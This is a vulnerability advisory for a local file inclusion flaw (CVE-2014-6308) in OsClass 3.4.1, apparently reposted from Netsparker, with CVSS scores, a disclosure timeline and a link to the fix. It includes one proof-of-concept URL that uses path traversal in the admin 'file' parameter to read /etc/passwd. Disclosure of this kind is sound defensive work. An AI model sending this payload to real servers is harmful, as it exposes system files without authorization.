OsClass 3.4.1 Local File Inclusion

2014.09.18
Credit: Omar Kurt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Information ----------- Advisory by Netsparker. Name : LFI Vulnerability in OsClass Affected Software : OsClass Affected Versions: 3.4.1 and possibly below Vendor Homepage : http://osclass.org/ Vulnerability Type : Local File Inclusion Severity : Critical CVE-ID: CVE-2014-6308 Netsparker Advisory Reference : NS-14-031 Advisory URL ------------ https://www.netsparker.com/lfi-vulnerability-in-osclass/ Description ----------- Local file inclusion vulnerability where discovered in Osclass, an open source project that allows you to create a classifieds sites. Technical Details ----------------- Proof of Concept URL for LFI in OsClass: http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd Advisory Timeline ----------------- 03/09/2014 - First Contact 03/09/2014 - Vulnerability fixed: https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 15/09/2014 - Fix released publicly in Osclass 3.4.2 Credits & Authors ----------------- These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner. About Netsparker ---------------- Netsparker can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. For more information on Netsparker visit https://www.netsparker.com.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top